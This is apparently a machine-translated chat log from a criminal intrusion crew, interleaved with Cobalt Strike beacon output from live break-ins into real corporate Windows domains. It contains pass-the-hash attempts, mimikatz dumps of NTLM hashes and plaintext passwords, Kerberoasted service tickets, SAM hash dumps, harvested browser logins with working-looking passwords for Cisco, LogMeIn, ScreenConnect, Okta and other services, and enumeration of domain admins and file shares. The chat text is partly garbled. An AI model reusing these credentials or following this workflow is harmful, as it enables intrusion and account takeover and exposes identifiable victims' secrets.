``Well datak you in the network or not? and the two sessions that I asked respawned again deadspavnas not workwith the domain also can not without the token however can not get the list dk and shuffled the point instead of the domain did tokenak came tried admin hash that above skinnytoo long with waterwaytut how are we doing?let's work with this grid for a while now. we can hang and graze again during working hours, when they appear ))[ ](https://mediaeveryone.com/group/sccy-com?msg=5NtMf6XhACe6Q8yyJ) Sure, they have a lot of data there)) it would be cool to get into the network of these guys) probably through a VPN go to several computers that are in the Invey and then do not pingnet 445 sees? well ping 10.0.0.96 does not pass it kakip does not ping?maybe yesVannData is a company that configured them backupsThere's also an odd thing - I hung invey and he caught something like `10.0.0.96 VANNDATA\patykr` but such IP is not pinged, I think, perhaps it's just those outsourcers via vpn or something like that ... no. There's no way to find the IT guys. They are logged in a couple of places but under YES codes, and even chrome is empty under them. The network is small, maybe outsource?
It's necessary in any case: there are the cracks from one NAS, and no cracks from the system that manages backups and one NAS on all machines in the domain: I checked all the files through SauronEye and manually, took off the chrome-dump - found no cracks of interest. Downloaded a backup of the mail IT specialist, there is correspondence on the implementation of backups, but no passwords in the mail.  In addition, the people involved in the correspondence about the backups (2019), now in the AD are absent341 pc.Looking for computers from the same OU as the current username only in routervpn seems to nouchuchit in the beginning - more was. strange as tovhodny point behind the vpn?see himself and the printer 445 see? and i want to do so, but is not pinging nihilo check other machines in this group for admin rights? clearly the system You have a local user admindae and what? i am again dumb? you took off the hell why?i will smb login to check if i find something, maybe from here there are routes to somewhere else, because he can not get a list of DCs, and around no one else no other options? i'll scan the network in large chunks, maybe i'll find someone ... and the rest checked?there's nowhere to put you put the kerbs? there's no one around, i have to jump on the dk, i guess it's LAa needed for the local accounta you did for a specific car the domain is still .pth W08872612198\"Remote Support" 296c19b3d2cb8e8729e5fe27f6cf764a in quotes did you do that? definitely better ``
user : remote support
domain : W08872612198
program : C:\Windows\system32\cmd.exe /c echo 083dd8b28e4 > \.\pipe\f5604a
impers. : no
NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a
  | PID 48836
  | TID 39276
  | LSA Process is now R/W
  | LUID 0 ; 1888192397 (00000000:708b878d)
  \_ msv1_0 - data copy @ 000002A8A21DC080 : OK !
  \_ kerberos -
``It doesn't look like it came out remote?
user : remote
domain : W08872612198
program : C:\Windows\system32\cmd.exe /c echo 6d969cf0c1b > \\.\pipe\36c22c
impers. : no
NTLM : 296c19b3d2cb8e8729e5fe27f6cf764a
  | PID 1112
  | TID 37960
  | LSA Process is now R/W
  | LUID 0 ; 1888127822 (00000000:708a8b4e)
  \_ msv1_0 - data copy @ 000002A8A1FDF650 : OK !
  \_ kerberos -
``I think it worked.'' Try the goo. How do you defeat the gap?
beacon> pth ".\Remote Support" aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a
[-] pth error: argument 'Support' is not an NTLM hash
Why don't you use the remote support account? There's also the LA, I'll try with it...can I put them there?
$krb5tgs$23$*scom$jdossn.local$MSSQLSvc/jdoscom02.jdossn.local:1433*$0A53423CE554B75B986FC90441C524D0$F6574AB286FE26D01E11A4565A47E2869480DED9C4F07730722CB1B24831AD7A24DCB958C0CB512DFA0C2BFBA56008DFCFE106A7CD45E7472B110D33733AF15DF2B0D51B0CF898821F1AB29B1693712EDEF6AA9F63A17DDAC1A333D76AF89DF5B4E1C6CB677B7A3514B4FCAB6F6B938558F88479B2EBE2367520DB73F76A84DB76B0FC8C9AD3305D79A8A2E58735C599E5E96EAEAF7DC261790525CA247E9A11011C1B282E39238790D3D36177908009A4CCCE3DB754CE38D18EB02EA90846DF8433186D5E17ADF646CC96C1C28C1C5FF37DB6807C1967D7950597D62B80471D23D9DC84D781C924CE4225B61D344E96F32BEB92025D9FA6A144014DA1E173E006A724B17B11548A2D47CE0DBD6E7007E3B90A401B1C41050D65A2BF155DC805979D97A29E95C52280C7F68474826AF6050094CF385CADD9C4588F5D07E29C039B82443B94D01D753E9F963BFB89BA6F0DB890C85F4E2DD27377A31D7BF8FA17ED6FEA7B5559CA977117698D818E737AE3907F7A3D9EEC23FBC6A2325ADF7F13417D9BFBBFB0B4EDC9B192FC0AA58BAF942B51343AD3151482B45789C8CB221E6BC0019420CC2DA4616B9590425658F1591F701F43FD23ED60F3CAB1467BBFBF74C3F4BA44B6096E42BB836E5556735CD70F6022BEBFCA1A67BE83D2ED4BD624F8C53CC324EED07061A9BF0BB

``Clear no, but this is YES``$krb5tgs$23$*svc_scomsql_2019$jdossn.local$MSSQLSvc/JDOSCOMDB61B.jdossn.local:1433*$4008BEF79B9FBFEA93486444F7C689FA$6FD6B9B0D97575B673871D574F773B010657441FC05475333EB66EDC0C2BE5D854321ACCACAA71D2E62932B6086C02FDD24424795BFA58C29CAD65170EE433294874E03ED98790269EEB27B5F659BF7E1ACB160621AF53591422E17E2BEF65F60A2FA12396019FB80ED918E72E9DB371436656D66532D90B62B7E0B77908A4F31D72B365EDF057CD6341907784E2F32C6D246C0D14CE00D66B73DA2D9CAC86DE151D8F09D05625F1D7234EC0E9D2C82E4743F18CD7F0B7C8D90E3A31F9F50508F5FECF6DA5FEF687385D0E608426726078CC03DC955E36B20F3CE6D0466411A3F3EFB0E0CD4DC9135D95B776DC280A05706583497741D9688911619E555F41163D0CE2A8B5F897A93212EA5541520806921B66BDBB7AF7A501D841EFB31D5905F8463EBE4C62F79961085BF92F32E05FDE49321458452C39C1355AC1C3D2AED2A67C6F1A2A755EA6264544C1DCF32F3355EB85F02BB526A1E7B86F38A18E994798E983859DAF0AF9E7803CA97CAD4DCEB9504C7AF4AAE124C328A7C16998F108DD54E5FE806A89DA06E46926F28ED096278F964253935BB8C57F90E7E43371300A94793443955E82CCF0F25BE8618A1DA0DDA6F1493004A26BFA663743B03B16AE7CEC0B8294546DB67C149739237771F890C13BEBD90D0C9B2124105D96C043AF50318081736615F728748A1
``Clear no''.
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jason:1003:aad3b435b51404eeaad3b435b51404ee:c06bbf80fa38c366ca3803b9e922bdd4:::
Remote Support:1002:aad3b435b51404eeaad3b435b51404ee:296c19b3d2cb8e8729e5fe27f6cf764a:::
W08872612198:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:039c94e617f2f4dd3651ee3873e640ea:::
``LA
```
Administrator
JDOSSN\Domain Admins
JDOSSN\NDLEADING_All_Users
JDOSSN_DLEADING_Computer_Account_Admins
JDOSSN/Sedona_CROPS_Admins
Remote Support
W08872612198
The command completed successfully.

``EA
```
[*] Tasked beacon to run: net group "enterprise admins" /dom
[+] host called home, sent: 65 bytes
[+] received output:
The request will be processed at a domain controller for domain jdossn.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
The command completed successfully.

``DA
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
a900221 AuditDB_svc AuditJDOSSNDA
DHSAdmin jdodmp_svc MPXAXDAgentAccount
PAM_PRD_JDO_EQI_01 PAM_PRD_JDO_EQI_02 scom
svc_audit svc_BuildAutomator svc_exchange
svc_OMAA svc_OMDAS svc_OMREAD
svc_scomsql_2019 svc_snow_preprod
The command completed successfully.

``net accounts
```
Force user logoff how long after time expires?
Minimum password age (days): 1
Maximum password age (days): 84
Minimum password length: 10
Length of password history maintained: 24
Lockout threshold: 8
Lockout duration (minutes): Never
Lockout observation window (minutes): 15
Computer role: BACKUP
The command completed successfully.


I don't see anything about the correct domain, I haven't cleaned it out
i just renamed the confab. why did they clean it out? and can you tell me the name of the PC where you came from? epcusa.com i will pass it on somehow the domain is admin
it means you have to reopen it. current time2020-12-23, 00:42:57a
what about a day ago? it's more like a year ago2020-12-22, 01:01:54 what was on the net now I'll check it tell me what needs to be reopened
$krb5tgs$23$*spps2007$epctech.com$MSSQLSvc/SQLSRV03.epctech.com

``There don't seem to be any sessions expected, but I made it here.
$krb5tgs$23$*avman$epctech.com$MSSQLSvc/ Kaspersky2013

````somerd.com` live session here
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
[+] received output:
televisa.com.mx
```
Hey, what time should we come in tomorrow? And we haven't got the comps yet, they'll be tomorrow oskin in lx, when they come will throw in the bruttoroogi no timlid or what? to whom to give the hash?
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRC1.jdossn.local\C$ - Default share
\JDOXADIRC1.jdossn.local\IPC$ - Remote IPC
\W088726111915.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726111915.ndleading.jdossn.local\C$ - Default share
\W088726111915.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726111915.ndleading.jdossn.local\print$ - Printer Drivers
\W088726111915.ndleading.jdossn.local\Upstairs Printer - Upstairs Printer
\WW08872611194.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W08872611194.ndleading.jdossn.local\C$ - Default share
\W08872611194.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08872611194.ndleading.jdossn.local\nic - nic
\WW08872611194.ndleading.jdossn.local\print$ - Printer Drivers
\\JDOFIEECONN01.jdossn.local/ADMIN$ - Remote Admin
\JDOFIEECONN01.jdossn.local\C$ - Default share
\JDOFIEECONN01.jdossn.local/IPC$ - Remote IPC
\JDOXADIRD1.jdossn.local/ADMIN$ - Remote Admin
\JDOXADIRD1.jdossn.local\C$ - Default share
\JDOXADIRD1.jdossn.local\IPC$ - Remote IPC
\JDOdc65.jdossn.local/ADMIN$ - Remote Admin
\JDOdc65.jdossn.local\C$ - Default share
\JDOdc65.jdossn.local\DealerConfig -
\JDOdc65.jdossn.local\EQAPP -
\JDOdc65.jdossn.local\EQDBBackup -
\JDOdc65.jdossn.local\EQPROF -
\JDOdc65.jdossn.local\EQUIPArchive -
\JDOdc65.jdossn.local\EQUIPAttachments -
\JDOdc65.jdossn.local\EQUIPREPORTS -
\JDOdc65.jdossn.local\HomeDirs -
\JDOdc65.jdossn.local\IPC$ - Remote IPC
\\Lockouts - Lockout logs
\JDOdc65.jdossn.local\MISCPROF -
\JDOdc65.jdossn.local\MXHomeDirs -
\JDOdc65.jdossn.local\MXShares -
\JDOdc65.jdossn.local\NETLOGON - Logon server share
\\Logon server share \JDOdc65.jdossn.local\SD -
\JDOdc65.jdossn.local/SDAttach -
\JDOdc65.jdossn.local/SDPROF -
\JDOdc65.jdossn.local\Shares -
\JDOdc65.jdossn.local\SYSVOL - Logon server share
\W08987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711192.ndleading.jdossn.local\C$ - Default share
\W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne)
\\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers
\W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4)

``D33r3123``
aad3b435b51404eeaad3b435b51404ee:12bd62ad7e74da42794b82f59d3c18ee
``````
dn:CN=Administrators,CN=Builtin,DC=jdossn,DC=local
>objectClass: top
>objectClass: group
>cn: Administrators
>description: Administrators have complete and unrestricted access to the computer/domain
>member: CN=VMjoinJDOSSN Group,OU=VM Clone Customization,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=a900221,OU=Patrol,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=Operations_All_Users,OU=Groups,OU=Operations,OU=JDIS,DC=jdossn,DC=local
>member: CN=CAG,OU=Citrix,OU=Service Accounts,DC=jdossn,DC=local
>member: CN=Enterprise Admins,CN=Users,DC=jdossn,DC=local
>member: CN=Domain Admins,CN=Users,DC=jdossn,DC=local
>member: CN=DHSAdmin,CN=Users,DC=jdossn,DC=local
``````
https://cloudsso.cisco.com/,https://cloudsso.cisco.com/sp/startSSO.ping,7/27/2018 11:23:30 AM,13177182210062277,nicd@leadingedgeequip.com,vgy7vgy7VGY
 
``Microadmin.
```
	 * Username : ndmicdgeorg
	 * Domain : JDOSSN
	 * NTLM : 053a03895fad0c33bb088137941ec5bc
	 * SHA1 : 27f1f87e2764ab71e5c971af2119f9750b2e01c0
	 * DPAPI : 57c9711ddeb916f0bce56ce6f6fe6a
``````
http://directwi.jdossn.local/,http://directwi.jdossn.local/Citrix/XenAppDirectWI/auth/login.aspx,5/30/2017 12:20:27 PM,13140638427060024,ndcarddalma,bhu8bhu8

``````
* Username : ndmictrobin
	 * Domain : JDOSSN
	 * NTLM : 23a7ccf40635bc590c3c98dbeed94e01
	 * SHA1 : b2907d5a9d75a60ddcb5ac994c26f5c567d83db2
``````
https://account.activedirectory.windowsazure.com/,https://account.activedirectory.windowsazure.com/ChangePassword.aspx,4/30/2019 10:30:51 AM,13201111851838636,,sWKwEcC2T:Gq62X
``````
https://sso.cisco.com/,https://sso.cisco.com/autho/forms/CDClogin.html,7/30/2018 9:01:24 AM,13177432884691813,nicd@leadingedgeequip.com,vgy7vgy7VGY

``````
	 [00000003] Primary
	 * Username : ndmictflana
	 * Domain : JDOSSN
	 * NTLM : 7bba5ae0ee513a322b7cf6b8768bb063
	 * SHA1 : 758182c25f76e6b83dbdaba52642e49326f558d9
``````
https://iduiaas.cloudapps.cisco.com/,https://iduiaas.cloudapps.cisco.com/web/registrationForm,7/27/2018 11:18:23 AM,13177181903702855,nicd@leadingedgeequip.com,vgy7vgy7VGY

``Go to the domain itself mb there redirect different, there since 2014 access is preserved) go to the full link? Well, it still does not work to the fact that it itself is external and I do not know whether through it to go to the domainada neti from outside do not go it is an external citra? 2fa
```
https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$
``[ ](https://mediaeveryone.com/group/snpartners-com?msg=TL63esuKb3YtfHDKq) doesn't go to the link, not even under the proxy of the machine you took it out of ``.
https://w08041911191-ndleading-jdossn-local-wocqspajes.app01-17.logmein.com/,5/1/2020 3:42:22 PM,13232839342283382,nddevbernst,Nrb11232010!

``````
https://micservice190-ndleading-jdossn-local-arzkebwqmq.lmi-app14-01.logmein.com/,10/20/2020 11:15:16 AM,13247684116208716,nddevbernst,NDleading2021!

``````
https://identity.webrootanywhere.com/,https://identity.webrootanywhere.com/v1/Account/login,3/16/2020 3:54:55 PM,13228865695219331,blainee@leadingedgeequip.com,ShadowFox5640!
 
https://johndeere.okta.com/,https://johndeere.okta.com/login/login.htm,3/13/2020 2:09:15 PM,13228600155038654,X096743,Nrb11232010!
 
https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,https://desktop-0bog84e-mlppczciax.app12-08.logmein.com/,2/5/2020 11:22:52 AM,13225396972110903,nddevbernst,mko0MKO)mko0MKO)
 
https://leadingedgeequip.screenconnect.com/Login,4/12/2020 10:11:37 PM,13231221097720457,blainee@leadingedgeequip.com,NDleading2020$
 
https://w08041912191-hewsstpmaj.app12-11.logmein.com/,https://w08041912191-hewsstpmaj.app12-11.logmein.com/,4/29/2020 8:54:24 AM,13232642064233077,nddevbernst,Nrb11232010!
 
https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,4/29/2020 3:26:37 PM,13232665597610069,PARTS100,Parts100
 
https://reports.secureexchange.net/,https://reports.secureexchange.net/admin/login.aspx,5/1/2020 10:48:43 AM,13232821723796642,devi201,Deere100
 
https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,https://desktop-0bog84e-cmilwzrpyj.app01-22.logmein.com/,8/26/2020 7:41:36 AM,13242919296305003,nddevbernst,Combine20!

``As long as he's caught with Citrix, try to get started too,`` by the way.
https://remotedesktop.google.com/,https://remotedesktop.google.com/access,8/27/2019 5:48:39 PM,13211419719369994,Blaine Home PC,11232010
``````
https://res.cisco.com/websafe/register,12/29/2016 10:16:37 AM,13127501797078616,Ernst,Jibs5640

``````
https://heritage-webapps.cvty.com/Citrix/Heritage-XenApp/auth/login.aspx,5/21/2014 7:11:20 AM,13045147880000000,A579851,oneway$5
``````
	 * Username : nddevbernst
	 * Domain : JDOSSN
	 * NTLM : 5b622ad5d550408ed6260c2b8fb185cc
	 * Password : Tractor20!

	 * Username : nddevkodell
	 * Domain : JDOSSN
	 * NTLM : 8de4a768f02760e576c5a5bb59c97771
 
	 * Username : nddeviowlbo
	 * Domain : JDOSSN
	 * NTLM : 4fd547943802ebb200777a443d3b06a4
	 * Password : NDspring2020
``````
\JDOXADCD3.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCD3.jdossn.local\C$ - Default share
\JDOXADCD3.jdossn.local\CtxSTShare -
\JDOXADCD3.jdossn.local\IPC$ - Remote IPC

``Check yet and it's not forbidden here``.
beacon> shell wmic /node:10.28.92.159 OS GET Name
[*] Tasked beacon to run: wmic /node:10.28.92.159 OS GET Name
[+] host called home, sent: 66 bytes
[+] received output:
Node - 10.28.92.159

ERROR:

Description = The RPC server is unavailable.
\W080332420b ndleading jdossn local\ADMIN$ - Remote Admin
\W080332420b.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W080332420b.ndleading.jdossn.local\C$ - Default share
\W080332420b.ndleading.jdossn.local\D$ - Default share
\W080332420b.ndleading.jdossn.local\IPC$ - Remote IPC
\W080332420b.ndleading.jdossn.local\Nic's Printer - Nic's Printer
\W080332420b.ndleading.jdossn.local\print$ - Printer Drivers
\W0W80332420b.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6
\\W080332420b.ndleading.jdossn.local\Users -
``or access to the rps service in general the admin ball should indicate the possibility of using the vmik utility and he just spit and spit them slowly still in the lab I remember how to run not glance at how sharpshare looks sharpsharefinder gives results already after the full completion of the scan so it's like sharpshare not in my processes so it's spit out noo sharfinder I ran it without output to a file not hashdump not do mimic not output under the system the session is nuts I don't know what it even is or still not working it's still working but I xvorvor it's sharfinder
 JID PID Description
 --- --- -----------
 51 72412 process
 52 218268 process
 74,996 PowerShell (Unmanaged)
``in johns* yesterday SharpShares was hanging in processes I don't know what of it SharpShares saw admin balls there? and yesterday it didn't spit out these balls came to the office now ShareFinder yesterday I used SharpShares before weekend at all low grade mystic scans no[ ](https://mediaeveryone.com/group/snpartners-com?msg=7BD3u87LJ9Rfyu3Nf) 1[ ](https://mediaeveryone.com/group/snpartners-com?msg=gNjQhyMhNFSrXhBXx) - then to the question above
beacon> shell dir \\10.28.92.159\ADMIN$
[*] Tasked beacon to run: dir \\10.28.92.159\ADMIN$
[+] host called home, sent: 56 bytes
[+] received output:
Access is denied.

``I still have a list of folders in admin ball?`` I immediately did "copy" on accessibility in the plan? how did you check the balls? but when I copy the case - Access is deleted then daon sees them how? on the ball for some reason it is not allowed in the subnet other than under that polzak above? there are many admin ball?
[+] received output:
\JDODHCP02.jdossn.local\ADMIN$ - Remote Admin
\JDODHCP02.jdossn.local\C$ - Default share
\JDODHCP02.jdossn.local\IPC$ - Remote IPC

[+] received output:
\tannerflanigan.ndleading.jdossn.local\ADMIN$ - Remote Admin
\tannerflanigan.ndleading.jdossn.local\C$ - Default share
\tannerflanigan.ndleading.jdossn.local\IPC$ - Remote IPC
\tannerflanigan.ndleading.jdossn.local\NPI602973 (HP LaserJet 400 M401dne) - Back Shop
\tannerflanigan.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOSQLEAST1C.jdossn.local\ADMIN$ - Remote Admin
\JDOSQLEAST1C.jdossn.local\C$ - Default share
\JDOSQLEAST1C.jdossn.local\E$ - Default share
\JDOSQLEAST1C.jdossn.local\G$ - Default share
\JDOSQLEAST1C.jdossn.local/IPC$ - Remote IPC
\JDOSQLEAST1C.jdossn.local\J$ - Default share
\JDOSQLEAST1C.jdossn.local\M$ - Default share
\JDOSQLEAST1C.jdossn.local/Q$ - Default share
\JDOSQLEAST1C.jdossn.local\T$ - Default share
\JDOSQLEAST1C.jdossn.local\V$ - Default share

[+] received output:
\W0W8987711192.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711192.ndleading.jdossn.local\C$ - Default share
\W0W8987711192.ndleading.jdossn.local\IPC$ - Remote IPC
\WW08987711192.ndleading.jdossn.local\NPI02DE8A (HP LaserJet 400 M401dne) - NPI02DE8A (HP LaserJet 400 M401dne)
\\{\W08987711192.ndleading.jdossn.local\print$ - Printer Drivers
\W0W8987711192.ndleading.jdossn.local\TJ NEW HP Color LaserJet Pro M478f-9f PCL-6 (V4) - HP Color LaserJet Pro M478f-9f PCL-6 (V4)

[+] received output:
\\JDODC61.jdossn.local\ADMIN$ - Remote Admin
\JDODC61.jdossn.local\C$ - Default share
\JDODC61.jdossn.local/IPC$ - Remote IPC
\JDODC61.jdossn.local/Lockouts -
\JDODC61.jdossn.local/NETLOGON - Logon server share
\JDODC61.jdossn.local\SYSVOL - Logon server share

[+] received output:
\JDOXADIRC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRC1.jdossn.local\C$ - Default share
\JDOXADIRC1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\\JDODHCP04.jdossn.local\ADMIN$ - Remote Admin
\JDODHCP04.jdossn.local\C$ - Default share
\JDODHCP04.jdossn.local\IPC$ - Remote IPC

[+] received output:
\DESKTOP-GCPB49A.ndleading.jdossn.local\ADMIN$ - Remote Admin
\DESKTOP-GCPB49A.ndleading.jdossn.local\C$ - Default share
\DESKTOP-GCPB49A.ndleading.jdossn.local\D$ - Default share
\DESKTOP-GCPB49A.ndleading.jdossn.local\IPC$ - Remote IPC
\DESKTOP-GCPB49A.ndleading.jdossn.local/NPI7CF108 (HP Color LaserJet MFP M477fdw) - NPI7CF108 (HP Color LaserJet MFP M477fdw)
\DESKTOP-GCPB49A.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\W0887261216KO.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W887261216KO.ndleading.jdossn.local\C$ - Default share
\W0W887261216KO.ndleading.jdossn.local\D$ - Default share
\W0W887261216KO.ndleading.jdossn.local\E$ - Default share
\W0W887261216KO.ndleading.jdossn.local\IPC$ - Remote IPC
\W0887261216KO.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\\JDOdc65.jdossn.local\ADMIN$ - Remote Admin
\JDOdc65.jdossn.local\C$ - Default share
\JDOdc65.jdossn.local\DealerConfig -
\JDOdc65.jdossn.local\EQAPP -
\JDOdc65.jdossn.local\EQDBBackup -
\JDOdc65.jdossn.local\EQPROF -
\JDOdc65.jdossn.local\EQUIPArchive -
\JDOdc65.jdossn.local\EQUIPAttachments -
\JDOdc65.jdossn.local\EQUIPREPORTS -
\JDOdc65.jdossn.local\HomeDirs -
\JDOdc65.jdossn.local\IPC$ - Remote IPC
\\Lockouts - Lockout logs
\JDOdc65.jdossn.local\MISCPROF -
\JDOdc65.jdossn.local\MXHomeDirs -
\JDOdc65.jdossn.local\MXShares -
\JDOdc65.jdossn.local\NETLOGON - Logon server share
\\Logon server share \JDOdc65.jdossn.local\SD -
\JDOdc65.jdossn.local/SDAttach -
\JDOdc65.jdossn.local/SDPROF -
\JDOdc65.jdossn.local\Shares -
\JDOdc65.jdossn.local\SYSVOL - Logon server share

[+] received output:
\\Jdodc51.jdossn.local\ADMIN$ - Remote Admin
\Jdodc51.jdossn.local\C$ - Default share
\Jdodc51.jdossn.local\D$ - Default share
\\Jdodc51.jdossn.local\F$ - Default share
\Jdodc51.jdossn.local\IPC$ - Remote IPC
\Jdodc51.jdossn.local/Lockouts -
\Jdodc51.jdossn.local/NETLOGON - Logon server share
\\{\Jdodc51.jdossn.local\print$ - Printer Drivers
\Jdodc51.jdossn.local\SYSVOL - Logon server share

[+] received output:
\DNDMIC61.jdossn.local\ADMIN$ - Remote Admin
\DNDMIC61.jdossn.local\C$ - Default share
\DNDMIC61.jdossn.local\IPC$ - Remote IPC

[+] received output:
\\JDOSQLEAST1D.jdossn.local\ADMIN$ - Remote Admin
\JDOSQLEAST1D.jdossn.local\C$ - Default share
\JDOSQLEAST1D.jdossn.local\E$ - Default share
\JDOSQLEAST1D.jdossn.local\G$ - Default share
\JDOSQLEAST1D.jdossn.local/IPC$ - Remote IPC
\JDOSQLEAST1D.jdossn.local\J$ - Default share
\JDOSQLEAST1D.jdossn.local\M$ - Default share
\JDOSQLEAST1D.jdossn.local/Q$ - Default share
\JDOSQLEAST1D.jdossn.local\T$ - Default share
\JDOSQLEAST1D.jdossn.local\V$ - Default share

[+] received output:
\JDOXADCC3.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC3.jdossn.local\C$ - Default share
\JDOXADCC3.jdossn.local\CtxSTShare -
\JDOXADCC3.jdossn.local\IPC$ - Remote IPC

[+] received output:
\JDOXADIRD1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADIRD1.jdossn.local\C$ - Default share
\JDOXADIRD1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\jdopbi01.jdossn.local\ADMIN$ - Remote Admin
\jdopbi01.jdossn.local\C$ - Default share
\jdopbi01.jdossn.local\IPC$ - Remote IPC

[+] received output:
\KNDMICEQRD61.jdossn.local\ADMIN$ - Remote Admin
\KNDMICEQRD61.jdossn.local\ASAData -
\KNDMICEQRD61.jdossn.local\ASALogs -
\KNDMICEQRD61.jdossn.local\Backups -
\KNDMICEQRD61.jdossn.local\C$ - Default share
\KNDMICEQRD61.jdossn.local\E$ - Default share
\KNDMICEQRD61.jdossn.local\G$ - Default share
\KNDMICEQRD61.jdossn.local\IPC$ - Remote IPC
\KNDMICEQRD61.jdossn.local\L$ - Default share
\KNDMICEQRD61.jdossn.local\M$ - Default share
\KNDMICEQRD61.jdossn.local\MirrorLogs -
\KNDMICEQRD61.jdossn.local\P$ - Default share
\KNDMICEQRD61.jdossn.local\SQLRemote -
\KNDMICEQRD61.jdossn.local\T$ - Default share
\KNDMICEQRD61.jdossn.local\Temp -

[+] received output:
\\JDODC69.jdossn.local\ADMIN$ - Remote Admin
\JDODC69.jdossn.local\C$ - Default share
\JDODC69.jdossn.local\IPC$ - Remote IPC
\JDODC69.jdossn.local/lockouts -
\JDODC69.jdossn.local/NETLOGON - Logon server share
\JDODC69.jdossn.local\SYSVOL - Logon server share

[+] received output:
\\JDODC64.jdossn.local\ADMIN$ - Remote Admin
\JDODC64.jdossn.local\C$ - Default share
\JDODC64.jdossn.local\DealerConfig -
\JDODC64.jdossn.local\EQAPP -
\JDODC64.jdossn.local\EQDBBackup -
\JDODC64.jdossn.local\EQPROF -
\JDODC64.jdossn.local\EQUIPArchive -
\JDODC64.jdossn.local\EQUIPAttachments -
\JDODC64.jdossn.local\EQUIPREPORTS -
\JDODC64.jdossn.local\HomeDirs -
\JDODC64.jdossn.local\IPC$ - Remote IPC
\JDODC64.jdossn.local/lockouts -
\JDODC64.jdossn.local\MISCPROF -
\JDODC64.jdossn.local\MXHomeDirs -
\JDODC64.jdossn.local\MXShares -
\JDODC64.jdossn.local\NETLOGON - Logon server share
\\JDODC64.jdossn.local/SD
\\SD - SDAttach - SDAttach - SDAttach.
\JDODC64.jdossn.local/SDPROF -
\JDODC64.jdossn.local\Shares -
\JDODC64.jdossn.local\SYSVOL - Logon server share

[+] received output:
\JDOXADCC1.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC1.jdossn.local\C$ - Default share
\JDOXADCC1.jdossn.local\CtxSTShare -
\JDOXADCC1.jdossn.local\IPC$ - Remote IPC

[+] received output:
\SNDMIC61.jdossn.local\ADMIN$ - Remote Admin
\SNDMIC61.jdossn.local/APPS - EQUIP APPS Share
\SNDMIC61.jdossn.local\AUTO-IT - EQUIP AUTO-IT Share
\SNDMIC61.jdossn.local\C$ - Default share
\SNDMIC61.jdossn.local\DPM - EQUIP DPM Share
\SNDMIC61.jdossn.local/DSJDIS -
\SNDMIC61.jdossn.local\EPC - EQUIP EPC Share
\SNDMIC61.jdossn.local\EQUIP - EQUIP EQUIP Share
\SNDMIC61.jdossn.local/IPC$ - Remote IPC
\SNDMIC61.jdossn.local/JDDTF - EQUIP JDDTF Share
\SNDMIC61.jdossn.local/SDDigitalSignature -
\SNDMIC61.jdossn.local\Units_Data - EQUIP Units_Data Share

[+] received output:
\\JDOCHOPS12.jdossn.local\ADMIN$ - Remote Admin
\JDOCHOPS12.jdossn.local\C$ - Default share
\JDOCHOPS12.jdossn.local\E$ - Default share
\JDOCHOPS12.jdossn.local\IPC$ - Remote IPC

[+] received output:
\W0W8987711191.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W0W8987711191.ndleading.jdossn.local\C$ - Default share
\W0W8987711191.ndleading.jdossn.local\dominics - dominics
\W0W8987711191.ndleading.jdossn.local\IPC$ - Remote IPC
\W0W8987711191.ndleading.jdossn.local\print$ - Printer Drivers

[+] received output:
\W088726121926.ndleading.jdossn.local\ADMIN$ - Remote Admin
\W088726121926.ndleading.jdossn.local\C$ - Default share
\W088726121926.ndleading.jdossn.local\D$ - Default share
\W088726121926.ndleading.jdossn.local\IPC$ - Remote IPC
\W088726121926.ndleading.jdossn.local\Nic's Printer - Nic's Printer
\W088726121926.ndleading.jdossn.local\print$ - Printer Drivers
\W0W88726121926.ndleading.jdossn.local\Upstairs MFP M477 PCL 6 - Upstairs MFP M477 PCL 6
\\W088726121926.ndleading.jdossn.local\Users -

[+] received output:
\JDOXADCC2.jdossn.local\ADMIN$ - Remote Admin
\JDOXADCC2.jdossn.local\C$ - Default share
